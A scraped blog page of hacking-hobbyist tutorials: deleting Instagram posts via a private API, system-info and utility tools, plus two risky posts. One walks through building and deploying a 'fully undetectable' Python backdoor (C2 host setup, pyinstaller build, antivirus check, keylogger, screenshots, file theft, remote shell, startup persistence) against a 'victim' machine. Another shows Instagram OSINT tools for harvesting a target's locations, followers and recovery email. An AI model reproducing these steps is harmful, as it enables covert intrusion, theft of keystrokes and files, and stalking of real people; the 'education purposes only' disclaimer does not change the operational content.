Featured

    Featured Posts

Delete Instagram posts with python

Not owning a smartphone at the moment, I am not able to delete or upload any post in my Instagram account as the Web version does not support such features at the moment. Being a heavy computer nerd, I decided to hack through the Instagram requests myself and figure out a way to fully purge my account directly from my computer.

Tools required to follow my humble research


  • Python 3.7 or later
  • virtualenv
  • pip
  • cURL

How to setup the environment for coding the script in python


First of all create a fresh directory for the project's root named python-instagram or any name which fits best for you. With the help of the virtualenv utility, create a fresh virtual environment with the main purpose of installing the required packages for powering the script.
cd python-instagram
virtualenv -p /usr/local/bin/python3.7 env # your python path here
Activate the fresh virtual environment with the help of the command shown below.
source env/bin/activate
Then install the instagram_private_api and ipython by running the command shown below on your local console while being inside the project's root.
pip install instagram_private_api ipython
Once you have managed to successfully install the above packages on your local environment, create the two scripts shown below with you favorite text editor. I prefer to use vim.
vim instagram.py
vim config.py
The first one serves as the main module for storing the whole code, while the second one stores configurations such as username and password which are required for the authentication.

Authenticate to your Instagram account


The package instagram_private_api helps to authenticate and launch requests to your account. Keeping it practical, launch the Ipython interactive shell through the terminal console like shown below.
ipython
Then import the class Client from the instagram_private_api like shown in the following instruction. 


Create an object of type Client by making use of the code shown below.


Once you have managed to create the object, try to find out the authenticated username and the unique id for your own account.


My results are shown below.
1293187874
hackermilk.info
The authenticated user id is of importance as it is part of the media_id argument which is required to delete a specific post. 

Delete a single post from Instagram


Thankful to the instagram_private_api library, media deletion is a very easy and straightforward process. The object of type  instagram_private_api.client.Client has a method named delete_media which requires one positional argument, specifically the media_id.

Running the delete_media without the required positional argument produces an error. Type the following piece of code in your previous Ipython session and see the result for yourself.

Once I managed to execute the piece of code shown above, I got the following error.


As you can see, the media_id is a required positional argument. To find out the id of an Instagram's post, copy it's url, attach it to the following and then launch it in your web browser.
http://api.instagram.com/oembed?url=
http://api.instagram.com/oembed?url=https://www.instagram.com/p/B61SOB3gR7c/
The request produces JSON data, useful to find out the media_id attribute. Mine is listed in the following section.
2212754920837291740_1293187874
A simple look at the above output makes one come to the conclusion that the authenticated user id is part of the media_id attribute.

After having retrieved the value of the media_id, run the following command in your previous Ipython interactive session with the main purpose of deleting the post.

On success, you should receive the following output.

Although the above code does what it is intended to do very well, the fetching of the media_id is done manually.

Fetch the media_id values in bulk automatically


With the main purpose of retrieving the media_id values in bulk, we need to study the requests taking place in our Instagram account with the help of Developer Tools

Go to your Instagram account, and do a right click on one of the posts. Then click on Inspect. Under the Network tab, you will be able to see the requests taking place. Make sure XHR is clicked.

Do a refresh on the page. An output similar to the one shown below will be displayed.
XHR Requests 

There are many requests taking place, but to our interest are the ones which contain JSON data on our posts. Check the ones which have ?query_hash= and make sure to select the one that has information on the nodes, similar to the one shown in the following screenshot.
JSON data returned by the request

In order to understand the structure of the specific request, we need to copy it as cURL
cURL request

Then we can reproduce the request by executing it on our console.
Executing cURL request in the console.

The above request returns the same JSON data as the XHR request. 

Request the JSON data with python

Having the request as cURL, makes it easier for us to imitate it with the help of python. Launch a new Ipython interactive shell at the project's root and run the following command with the main purpose of importing the library for performing requests.

Then extract the value of the cookie header from the cURL request data and save it inside a dictionary like shown below.


Once you have managed to properly setup the cookie value, launch the request by following the code shown below.


As for the value of the query_hash, it can be easily extracted from the cURL request data. Once the request has been accomplished successfully, get the returned JSON data and save it into some variable like shown below. 


The returned JSON data contains information on the posts, known as nodes. Each one of the nodes contains a unique id, truly import for our research.

Fetch the returned nodes by filtering JSON data with the help of the command shown below.



Once you have managed to get the list of nodes, make use of a for loop to find out the unique id for each. 



After executing the above code on my Ipython interactive shell, I managed to get the unique id for each one of the twelve nodes returned in the JSON data.

unique id for each one of the twelve posts

Delete the posts in bulk


Having the id for each one of the twelve posts, we can try to perform a bulk deletion with the help of a python for loop.

First we need to attach the unique user's id to each one of the twelve ids and store them inside a python list object.


Print the list ids to make sure the data has the right form.
media_id of each post

Then, with the help of a for loop, run the delete_media method on each one of them. 


Final thoughts


Although we haven't fully purged our Instagram account, we managed to perform a bulk deletion through this first part by using a few lines of python code. As I continue my research on this topic, in the second part I will code a custom script with the main purpose of performing a full purge on any account.

Copyright hackermilk.info  

Instagram OSINT with python tools

Information gathering is crucial to the hacking process. Due to the passion of open source hackers, there are many information gathering tools, easy to setup and use. Progressing in my journey as a beginner hacker, I decided to share some useful tools in Instagram OSINT.

Osintgram

An interactive tool which offers information gathering on data such as the addresses registered by target photos, followers, followings and others like the ones listed below.
  • hashtags
  • captions
  • mediatype
  • likes
  • comments
  • verified
  • business or not
The tool also offers data downloading such as the profile picture and the entire photos published by the user.

Setup the tool

As for the configuration of the tool, Python 3.6 or later is required. Before creating the virtual environment and configuring the packages required by the project, we need to download or clone the repository from Github.
Open a fresh command prompt or terminal console and run the following command.
git clone https://github.com/Datalux/Osintgram.git
Then create a fresh virtual environment inside the project's root directory with the help of the following command.
virtualenv -p /usr/local/bin/python3.7 env # make sure to include your absolute path
Install the required packages.
pip install -r requirements.txt
Once you have managed to install the required packages, you need to configure the tool so it can authenticate to your existing Instagram account. Create a subdirectory called config, and two fresh files inside it like shown below.
Osintgram
    config
        username.conf
        pw.conf
Put the username inside the username.conf file and the password inside the pw.conf.

How to gather information from Instagram with Osintgram

Once you have managed to properly setup the tool, information gathering is extremely easy due to the interactive shell being offered. Run the following command to start open source intelligence gathering on your target of choice.
python main.py oltjano13 # make sure to put the username of your target
As soon as the authentication is finished, the tool will prompt a command line from which you can run different commands. The screenshot shared below perfectly illustrates the written words.
The first command which I like to run is the one that gives me information on the geotags shared by the user. Such data is useful, especially if you are interested in the location the user is based.
addrs
If the above command executes successfully, you will be able to get detailed information on the addresses of the photos being shared by them.

The result of the above command is shown below.

To get the hashtags used by the target, run the following command inside the interactive shell offered by the tool.
hashtags
If no hashtags available, nothing will show up on the console. As for the captions, the following command can be used.
captions

Getting the full list of the target's followers is as easy as typing the following command.
followers
As for the Instagram users followed by the target, the following command should be used.
followings
Information on the likes received on the target's photos can be gathered through the help of the command shown below.
likes

Another command which I find very useful in open source intelligence gathering with the help of Osintgram, is the one which finds description of the user's photos.
photodes
The tool is able to read the text each photo contains.
Due to the rich features offered by Osintgram, it's also possible to download the entire photos shared by the target, their profile picture, and the stories.
The following command can be used to fully download the photos shared by the target.
photos
As for the target's stories, use the command shared below.
stories
The downloaded data is going to be saved under the directory output which the tool automatically creates for the data storage.

Although not the best tool available for performing OSINT on Instagram, Osintgram is worthy being on your toolset as a beginner hacker.

OSI.IG

Not as rich in features as Osintgram, OSI.IG is way easier to setup as it does not require an Instagram account for authentication. With the help of such tool, a hacker is able to get the following information from a target account.

  • username
  • profile name
  • url
  • followers
  • following
  • number of posts
  • bio
  • profile picture url
  • is business account
  • is connected to facebook
  • external url
  • is private
  • is verified
  • tags
  • post location
  • post timestamp
  • post caption
  • number of comments in a post
  • post picture url
  • likes in post

Setup the tool

Launch a fresh console and clone the official repository on your directory of choice with the help of the command shown below.
git clone https://github.com/th3unkn0n/osi.ig.git
Then navigate to the project's root with the help of the command shown below.
cd osi.ig
Create a fresh virtual environment by making usage of python 3.6 or a later version.
virtualenv -p /usr/local/bin/python3.7 env
Activate the virtual environment and install the required packages for the project to properly function.
source env/bin/activate
pip install -r modules

How to gather information from Instagram with OSI.IG

Once you have managed to correctly setup the tool, gathering basic information on the target is as easy as typing the command shown below.
python main.py -u oltjano13 # make sure to put your target's username in here
The execution of the above command produced the result shown below.

It's also possible to get detailed information on each post published by the target. To perform such task, the option -p is required.
python main.py -u oltjano13 -p
For each post published by the target the tool will display information in the format shown below.
picture : http://tinyurl.com/yxphr4y6
comments              : 2
comments disabled     : False
timestamp             : 1573809564
likes                 : 4
location              : None
accessability caption : Photo by oltjano on November 15, 2019.
In order to save the data to a local file make sure to include the option -s in your command; exactly as shown in the following command.
python main.py -u oltjano13 -p -s

Toutatis

Way simpler than the tools shared above, Toutatis helps to find out information from the target such as e-mails, phone numbers, biography, user id and a few others.

Same as Osintgram, this Instagram OSINT tool requires that you are logged in to an account.

Setup the tool

First of all, clone the official repository with the command shown below.
git clone https://github.com/megadose/toutatis.git
Then navigate to the project's root with the help of the command shown below.
cd toutatis
Create a fresh virtual environment by making use of python 3.6 or a later version.
virtualenv -p /usr/local/bin/python3.7 env
Activate the virtual environment and install the required packages so the project can function properly.
pip install -r requirements.txt

How to gather information from Instagram with Toutatis

Once you have managed to setup the Toutatis OSINT tool, the following command should be used in order to start gathering information on a target.
python toutatis.py -u oltjano13 -s 1359267834%3B5yhoKLNFGiPGJ%3D6

Just make sure to replace the target's username and session id with your own.

A cool feature offered by Toutatis is the one which extracts the recovery email based on the target's username. Such utility can be accessed through the python's interactive shell like shown below.
from toutatis import *
recoverEmail("oltjano13") 
The result of the above command is shown below.
'j*******3@gmail.com'

instaloctrack

Unlike the tools being shared so far through this article, instaloctrack is specifically focused on collecting the entire photo locations of the target with the main purpose of placing them on a map.

Setup the tool

Make use of the command shown below to clone the official repository.
git clone https://github.com/bernsteining/instaloctrack.git
Navigate to the project's root.
cd instaloctrack
Create a fresh virtual environment and install the requirements.
virtualenv -p /usr/local/bin/python3.7 env
pip install -r requirements.txt
According to the tool's official documentation being published on Github, Selenium and Chromedriver is being used for scraping the data.
brew cask install chromedriver # os x users
sudo apt install chromedriver # debian based users

How to gather information from Instagram with instaloctrack

Once you have managed to properly setup the tool with the whole of its requirements, you can easily collect all the locations of a target by making use of the command shown below.
python instaloctrack/instaloctrack.py -l wisdomovermoney13 -p password -t fhollande
If the authentication is made successfully, the tool with automatically start scraping for locations with the main purpose of geocoding and placing them on a map.
Once the process of location gathering is finished, you can easily find the collected data on the subdirectory output.
open output/fhollande/fhollande_instaloctrack_map.html
And the results are being shown below.

pervertgram

Written in flask, pervertgram offers an easy to use web interface which can be operated even by those who are not familiar with the command line.

Setup the tool

First clone the official repo with the command shown below.
git clone https://github.com/CyberSaxosTiGER/pervertgram.git
Then navigate to the project's root.
cd pervertgram
The project runs on python 3.8 so make sure to include it while creating the virtual environment inside root directory.
virtualenv -p /usr/local/bin/python3.8 env
Activate the virtual environment, generate the requirements.txt and then install the packages.
source env/bin/activate
pip3 install pipenv
pipenv run pip freeze > requirements.txt
pip3 install -r requirements.txt
Then create a new file named config.json and make sure it follows the pattern shown below.
 {
   "username": "username",
   "password":  "password"
 }  

How to gather information from Instagram with pervertgram

Launch the flask application with the help of the command shown below.
python app.py
Then open a new tab in your browser and copy paste the following url to get the target's profile picture in high definition.
http://localhost:5002/dp/target_user_here/

As for the followers of the target, the url shown below will do the job.
http://localhost:5002/followers/target_user_here
In order to find out the users followed by the target, just replace followers with followings as shown in the section below.
http://localhost:5002/followings/target_user_here
The tool is going to display each user in a web format.

Final thoughts

OSINT is a must as your progress in your journey as a hacker. Thankful to the open source hackers worldwide, there are many open tools which can be utilized in the area of information gathering. 

Through this article I shared some of the most famous Instagram OSINT tools. Proven useful to me, I hope each one of them is worthy to be in your hacker's toolset. As for the errors you encounter while setting them up, or using them; feel free to comment and I will find time to reply as soon as possible.

Copyright hackermilk.info  

Open source command line tools to gather information on your unix like operating system

Having information on your local hardware as well as the core software which powers the various functionalities of your own operating system, is always a good idea to have. Fortunately for us, there are many open source tools available completely for free; and what's most important, highly customizable.

Neofetch

Written completely in Bash scripting language, neofetch is very useful when it comes to system information. Fast and easy to run, this command line tool offers the following system information by default:
  • OS
  • Host
  • Kernel
  • Uptime
  • Packages
  • Shell
  • Resolution
  • Terminal
  • Terminal Font
  • CPU
  • GPU
  • Memory
Being highly customizable through its configuration file, neofetch can be tweaked to meet your specific needs. Available for anyone to give it a try, neofetch can be easily cloned with the help of the command shown below.
git clone https://github.com/dylanaraps/neofetch.git
Once you have managed to download the project's directory structure on your local system, navigate to it with the help of the command shown below.
cd neofetch
Make the bash script executable with the help of the command shown below.
chmod +x neofetch
Then execute the script by running the following command on your local console.
./neofetch
The image shared above, perfectly illustrates the output of the command's execution on my OS X machine. Although by default neofetch displays system information in a colorful output, the --stdout flag can be used to normally print to standard output.
./neofetch --stdout
Once I managed to execute the above command on my local console, I got the following output.
OS: OS X El Capitan 10.11.4 15E65 x86_64
Host: MacBookAir7,2
Kernel: 15.4.0
Uptime: 1 day, 4 hours, 2 mins
Packages: 35 (brew)
Shell: bash 3.2.57
Resolution: 1440x900
DE: Aqua
WM: Quartz Compositor
WM Theme: Blue (Light)
Terminal: Apple_Terminal
Terminal Font: Menlo-Regular
CPU: Intel i5-5250U (4) É 1.60GHz
GPU: Intel HD Graphics 6000
Memory: 4686MiB / 8192MiB 
The above command is very useful when piping is required. There are many other various flags present in neofetch; each one of them serves a well defined purpose.

A practical and handy flag, is the --shell_path. According to the official documentation, it is off by default. Anytime you want to receive the absolute path of the current shell running on your operating system, the --shell_path flag can be used.
./neofetch --stdout --shell_path on
The execution of the above command, produced the output shown below on my local console.
OS: OS X El Capitan 10.11.4 15E65 x86_64
Host: MacBookAir7,2
Kernel: 15.4.0
Uptime: 1 day, 16 hours, 7 mins
Packages: 35 (brew)
Shell: /bin/bash 3.2.57
Resolution: 1440x900
DE: Aqua
WM: Quartz Compositor
WM Theme: Blue (Light)
Terminal: Apple_Terminal
Terminal Font: Menlo-Regular
CPU: Intel i5-5250U (4) @ 1.60GHz
GPU: Intel HD Graphics 6000
Memory: 3246MiB / 8192MiB 
It does not take a genius to distinguish the role of the --shell_path flag; which when turned on gives the user the absolute path of their current shell.

Neofetch can also be used to gather only very specific information on the system. Such task can be accomplished with the help of the following functions:

  • model
  • distro
  • kernel
  • uptime
  • packages
  • shell
  • resolution
  • de
  • wm
  • wm_theme
  • theme
  • icons
  • term
  • term_font
  • cpu
  • gpu
  • memory
  • disk
  • cpu_usage
  • battery
  • users
  • local_ip
  • public_ip

With the main purpose of illustrating the usage of functions for extracting specific information on the system, let's run the following example on the local console.
./neofetch memory
Once the above command got executed on my system, the following output came on my console.
memory: 2878MiB / 8192MiB 
Based on my experience with neofetch, it is also possible to have multiple functions listed on the command line.
./neofetch memory battery cpu_usage
The execution of the above command produces specific output, according to the functions specified as options in the command line.
memory: 2881MiB / 8192MiB
battery: 92%
cpu_usage: 39%
Now that you have a basic understanding of neofetch, enough to gather system information on your machine, let's make the changes permanent. First, let's install the neofetch tool on the machine with the help of the following command.
sudo make install 
If everything went like it is supposed, now you should be able to run neofetch directly from your console, without having to navigate to the project's directory structure. Launch a new console and try to run neofetch with the help of the following command.
neofetch
Time for some customization. According to the official documentation shared on the Github platform, we can easily adapt neofetch to fit our custom needs by making changes to its configuration file. Before making any changes, it is required that we locate the neofetch's configuration file.

Being an OS X user, the absolute path shared below helps me locate the configuration file of my local neofetch tool.
$HOME/.config/neofetch/config.conf
Once you have managed to locate the neofetch's configuration file, you can easily customize the tool to your own specific needs by commenting, uncommenting lines of code and also turning flags on and off.

The functions at the top of the configuration file, give you total freedom on the kind of system information you want to be displayed by default once the neofetch program is executed on the local console.
  3 print_info() {
  4     info title
  5     info underline
  6
  7     info "OS" distro
  8     info "Host" model
  9     info "Kernel" kernel
 10     info "Uptime" uptime
 11     info "Packages" packages
 12     info "Shell" shell
 13     info "Resolution" resolution
 14     info "DE" de
 15     info "WM" wm
 16     info "WM Theme" wm_theme
 17     info "Theme" theme
 18     info "Icons" icons
 19     info "Terminal" term
 20     info "Terminal Font" term_font
 21     info "CPU" cpu
 22     info "GPU" gpu
 23     info "Memory" memory
 24
 25     # info "GPU Driver" gpu_driver  # Linux/macOS only
 26     # info "CPU Usage" cpu_usage
 27     # info "Disk" disk
 28     # info "Battery" battery
 29     # info "Font" font
 30     # info "Song" song
 31     # [[ "$player" ]] && prin "Music Player" "$player"
 32     # info "Local IP" local_ip
 33     # info "Public IP" public_ip
 34     # info "Users" users
 35     # info "Locale" locale  # This only works on glibc systems.
 36
 37     info cols
 38 }
As you may have already guessed, the lines that start with a # are deactivated functions. We can easily activate them by removing the #.

With the main purpose of customizing neofetch to my own needs, I am going to uncomment the following functions:
# info "GPU Driver" gpu_driver  # Linux/macOS only
# info "CPU Usage" cpu_usage
# info "Disk" disk
# info "Battery" battery
# info "Users" users
# info "Local IP" local_ip
Once you have managed to activate the functions you have selected, save the file and run the neofetch tool directly from your console with the help of the command shown below.
neofetch --stdout
The execution of the above command produces a longer output when compared to the previous ones, due to the activation of new functions.
OS: OS X El Capitan 10.11.4 15E65 x86_64
Host: MacBookAir7,2
Kernel: 15.4.0
Uptime: 2 days, 15 hours, 39 mins
Packages: 35 (brew)
Shell: bash 3.2.57
Resolution: 1440x900
DE: Aqua
WM: Quartz Compositor
WM Theme: Blue (Light)
Terminal: Apple_Terminal
Terminal Font: Menlo-Regular
CPU: Intel i5-5250U (4) É 1.60GHz
GPU: Intel HD Graphics 6000
Memory: 3307MiB / 8192MiB
GPU Driver: macOS Default Graphics Driver
CPU Usage: 12%
Disk (/): 79G / 86G (93%)
Battery: 72%
Local IP: 192.168.252.205
Users: oltjano
It is a truly good idea to include the neofetch in the .bash_profile file, so the program automatically runs each time a fresh terminal console is launched. Just make sure to include the following line inside the .bash_profile file.
neofetch

screenFetch

Same as neofetch, screenFetch is entirely written in the Bash scripting language. Currently at version 3.9.1, it supports many flavors of linux, as well as operating systems which have support for the Bash shell.

Although not as rich in features as neofetch, screenFetch accomplishes well what is designed for. It's setup is pretty straightforward for anyone who has a basic knowledge on the command line. With the main purpose of demonstrating screenFetch in action, clone the official project with the help of the following command.
git clone https://github.com/KittyKatt/screenFetch.git
Then navigate to the project's root directory with the help of the cd command.
cd screenFetch
Make the Bash script executable with the help of the command shown below.
chmod +x screenfetch-dev
Then run the screenFetch program by executing the command shown below.
./screenfetch-dev
Once I managed to execute the above command on my terminal console, I got the following output.
Many various options part of screenFetch can be used to customize system information according to your specific needs. For example, the -n option can be used to remove the ASCII distribution logo from being displayed.
./screenfetch-dev -n
The output of the above command's execution is shown below.
 oltjano@oltjanos-MacBook-Air
 OS: 64bit Mac OS X 10.11.4 15E65
 Kernel: x86_64 Darwin 15.4.0
 Uptime: 3d 14h 58m
 Packages: 101
 Shell: bash 3.2.57
 Resolution: 1440x900
 DE: Aqua
 WM: Quartz Compositor
 WM Theme: Blue
 Font: snameX$classesVNSFontXNSOb
 Disk: 86G / 92G (95%)
 CPU: Intel Core i5-5250U @ 1.60GHz
 GPU: Intel HD Graphics 6000
 RAM: 2601MiB / 8192MiB
You can also strip all the colors from output by making use of the -N option.
./screenfetch-dev -n -N
A useful option is the -s; it tells the script that you want to take a screenshot of the system information.
./screenfetch-dev -s

Final thoughts

System information tools are very useful when it comes to data gathering on the hardware of your machine. Being fully open source, the tools being shared through this article can be easily tweaked to fit your specific needs.

How to create a photo collage with this python script

Being an open source lover, I decided to give a try to a photo collage creator which I did find on Github. Impressed by the results of the tool, I thought it would be a good idea to share it with python users.

Download and setup the tool on your local environment

First of all, go on Github and do a clone of the repository or download it as a zip file. I prefer using the following command to clone the official repository on my local machine.
git clone https://github.com/delimitry/collage_maker.git
Once you have managed to download the project on your computer, navigate to the root directory with the help of the terminal; so you can make usage of the script.
cd collage_maker
Create a virtual environment inside the project's root directory by making use of the python 2.7.x and install the pillow library as it is required by the tool for the image processing.
virtualenv -p /usr/bin/python2.7 env
source env/bin/activate
pip install pillow

Generate your first photo collage

The tool is simple to use. Having a very clear documentation on its command line interface, the options are self explanatory.
Once you have managed to navigate to the root directory of the project; create a directory with the whole photos which you want to include in the collage. Just make sure to remember its absolute path so you can use it later inside the tool.

Personally, I like to keep the directory with the photos on my Desktop. The following is its absolute path.
/Users/oltjano/Desktop/collage 
The options which you need in order to generate the photo collage are being shown below.
-f the full path of the directory with the photos
-o the photo in the output, usually in .png
-w width of the photo in the output
-i height of the photo in the output
Then run the following command on the terminal while being inside the project's root.
python collage_maker.py -f /Users/oltjano/Desktop/collage -w 800 -i 250 -o /Users/oltjano/Desktop/photo_collage.png
The following is the output on my case.
Having tried many various parameters for the -w and -i, the ones being shared above fit the best. Another option which seems useful to me is the -s. It helps to shuffle the images in the collage.
python collage_maker.py -f /Users/oltjano/Desktop/collage -s -w 800 -i 250 -o /Users/oltjano/Desktop/photo_collage.png
Copyright hackermilk.info

Purge your gmail inbox with this python script

My gmail inbox is full. Cleansing almost 400k of emails from my inbox manually is impossible, so I decided to put into usage a very useful Python script which I found on Github after hours of research. 

Being able to run the script in the background, I managed to cleanse almost 22k emails in a 4 hours period of time. Although not the best tool available, the fact it is open source and free, makes it the best option for my own case.

Download the tool from Github

Make use of the following command to download the source code from the official repository.
git clone https://github.com/marin117/Gmail-deleter.git

How to setup the script on your own machine

Having tested the tool with Python 2.7, I have come to the conclusion that such version of Python is the right one for setting up the environment. As for the dependencies, a virtual environment is required. The following command can help you to setup a fresh virtual environment inside the project's root.
virtualenv -p /usr/bin/python env
source env/bin/activate 
Then install the requirements with the help of the following command.
pip install -r requirements.txt
Once you have managed to successfully install the requirements on your own machine, then comment the following lines.
#import matplotlib.pyplot as plt # on google_client.py
#import matplotlib.pyplot as plt # on gmail_deleter.py
The last thing is to enable the Gmail API and save the credentials.json inside the project's root directory.
Click on Create and then download the configuration.

Once you have downloaded it, save it inside the project's root directory. Such step is required for the authentication. Now you are ready for the purge.

Purge your gmail inbox

The initiation of the purge is as simple as typing the following command while being inside the project's root directory.
python src/gmail_deleter.py
Once the above command is being executed successfully then the following will come up.

Choose the first option as shown below.
1

And let the purging take place. Enjoy the script in the background while working on your daily tasks.
Copyright hackermilk.info

Python Backdoor, fully undetectable and rich in features

Introduction


Python-Backdoor is a fully undetectable backdoor written entirely in Python with the main purpose of  contributing to the cybersecurity field. Rich in features, although it's server can be operated from the whole range of well known operating systems, it targets the Windows machine.

Having tested this cyber weapon on my own lab, I came to the conclusion that such tool is worth being shared with anyone who is passionate about computer security, or penetration testing.

Features

  • Multi-client support
  • Cross-platform server
  • Builtin-keylogger
  • Ability to send command to all clients
  • Ability to capture screenshots
  • Ability to upload/download files
  • Ability to send messages
  • Ability to run at startup
  • Ability to browse files
  • Ability to dump user info
  • Ability to open remote cmd
  • Ability to open remote python interpreter
  • Ability to disable task manager
  • Ability to shutdown/restart/lock pc
  • Ability to melt file on startup

How to setup the Python-Backdoor on your own lab

According to the official documentation shared on the author's Github page, Python-Backdoor requires Python 3.6 or Python 3.7. As for the building of the client, a Windows box is required.

Download the project from the official repository

Run the following command to download the source code for the Python-Backdoor.
git clone https://github.com/xp4xbox/Python-Backdoor.git

Create a virtual environment and install the requirements

Before installing all the python packages required by the project, it is required that you create a fresh virtual environment inside the project's root directory.
cd Python-Backdoor
virtualenv -p /usr/local/bin/python3.7 env
Once you have managed to create the virtual environment install the requirements with the following command.
source env/bin/activate # activate the virtual environment
pip install -r requirements.txt

Setup the victim machine

As for the victim machine, I am going to setup a Windows 10 operating system on my Virtualbox. Not only I am going to infect it, but I am also going to use it for building the client.

Make sure to have Python 3.7 or 3.8 installed on the target machine.

Generate the virus

Once you have managed to download the Python-Backdoor on your Windows machine, make sure to navigate to it and run the following command to install the requirements.
pip install -r requirements.txt
Then edit the following line with the server's IP address on client.py so the virus connects to the server.
strHost = "127.0.0.1"


Then run the following command to finally generate the executable virus.
pyinstaller client.py --exclude-module FixTk --exclude-module tcl --exclude-module tk --exclude-module _tkinter --exclude-module tkinter --exclude-module Tkinter --onefile --windowed


If everything goes fine, you can easily locate the client under the subdirectory dist of the project.

Scan the virus client

It is always a good idea to scan the client with the whole antiviruses available on the target machine; for the purpose of this tutorial I am scanning the fresh client with Microsoft Defender.

Start the server

Before running the client on the target machine, it is required that you start the server. The following command can help to do that.
python server.py # make sure to be inside the project, server side

Run the client on the target

Once you have managed to launch the server on the host machine, go on the target machine and run the client as a normal program.

If everything goes fine, you should get a connection on the server side like shown below.

Interact with the connection

To interact with the connection type the following command.
--i 0 # 0 is the id of the session

Get information on the user

Getting information on the user running the target machine can be achieved with the help of the following command.
--u

Take a screenshot on the target

Taking a screenshot on the victim machine is as easy as typing the following command on the server side.
--p

Start a keylogger on the target machine

To start a keylogger on the victim's machine, just type the following command.
--k start
When you're done, dump the logged data with the following command.
--k dump
The logged data is going to be printed out on the console.

Send a message to the user

The Python-Backdoor offers the option to troll with the victim. Such option is shown in the following command.
--m Hello from space

Download files from the target machine

To download files from the target machine, type the following command.
--r
Then provide the full path of the file you want to download.

Open a remote Python interpreter

It is also possible to run a Python interpreter on the remote machine. The following command can help you to do that.
--i 

Open a remote command prompt

To open a remote shell, type the following command.
--e

Add the rat to startup

Such feature is extremely useful as it automatically triggers a connection back to the server each time the user restarts the target machine.
--a 1

Restart the user

The command to restart the user is being shown below.
--x 2 

Conclusion

Having covered the most important and useful features offered by the Python-Backdoor, it is up to you to further explore and see its abilities in live situations. Being fluent in Python, I find this cyber weapon truly easy to setup and operate.

Disclaimer: Education purposes only.

Copyright hackermilk.info

How to share files from os x host to windows guest on virtualbox via ftp

There are various reasons why one may want to share files from his OS X machine to guests on VirtualBox. No matter the reason, the option offered by default in Oracle VM VirtualBox, does not work straight away.

With the main purpose of easing the struggle of those who are facing a hard time while trying to share files with their guests on VirtualBox, I decided to give some clear and concise instructions as an alternative solution to the problem.

Requirements

  • FTP server on OS X
  • FTP client on guest machine

Launch the FTP server on OS X

The OS X operating system has an FTP server installed by default. It can be easily activated with the help of the following command on the console.
sudo -s launchctl load -w /System/Library/LaunchDaemons/ftp.plist
Once you have managed to start the FTP server on your local OS X machine, you need to find out the IP address of the machine so you can use it later when connecting from the client.

Find out the IP address of the OS X machine 

Run the following command on your terminal console and the IP address will get printed out. Make sure to save it on a text file for later usage.
ifconfig

Start the FTP connection from the guest on Virtualbox

Offering an FTP client by default, we can easily initiate a connection from the Windows guest by making use of the following command.
ftp 192.168.0.10
Note: Make sure to put the IP address of your OS X host machine.

Provide the correct username and password when asked, and be ready to download the files from the FTP server.

Download files from the FTP server

Downloading files from the FTP server is as easy as typing the command get and the absolute path of the file after it.
get /Users/oltjano/Desktop/nc.exe
As you can easily spot from the above illustration, the command for performing the task of file download is simple and very practical.

Download all the files from the directory

In case you need to download multiple files from the FTP server, all you need to do is type the following command while being in the directory containing the files.
mget *
Copyright hackermilk.info

An open source alternative to Internet Download Manager written in Python, pyIDM


Most of the computer geeks are familiar with the Internet Download Manager tool. Although it is one of the best among download managers; being a soldier of open source software, I decided to share pyIDM as an alternative for anyone who is passionate about computer programming. 

According to the official documentation shared on the Github platform, pyIDM supports multi-connections at a high speed due to its download engine which relies entirely on LibCurl.

How to install the requirements for running pyIDM on your machine

Depending entirely on Python open source libraries, it is a good idea to create a fresh virtual environment inside the project's root directory after having cloned it.
git clone https://github.com/pyIDM/pyIDM.git
Navigate to the pyIDM project's directory by using the command which corresponds to your own operating system. Being a Unix based user, the cd command accomplishes the task for me.
cd pyIDM
Create a fresh virtual environment inside the directory by making use of a Python executable which is of version 3.6 or higher.
virtualenv -p /usr/local/bin/python3.7 env
Then activate the virtual environment and install all the dependencies of the project by making use of the commands shown below.
source env/bin/activate
pip install certifi PySimpleGui pyperclip plyer youtube_dl pycurl
Once you have managed to install the entire packages successfully, you can easily run the program with the help of the command shown below.
python pyIDM
The following should prompt.

Let's do a simple download by providing the url of a Youtube video like shown in the following screenshot.
Then choose the quality of the video stream which you want to download.
Click on the Download button and let pyIDM accomplish the task for you.
Under Setting tab, you can easily tweak the maximum connections per download; ranging from 1 to 100.

There are many themes offered by pyIDM which you can choose from. Just go under Setting and see for yourself.

Copyright hackermilk.blogspot.com 

www.CodeNirvana.in

Blog Archive

Recent Posts

Translate

Total Pageviews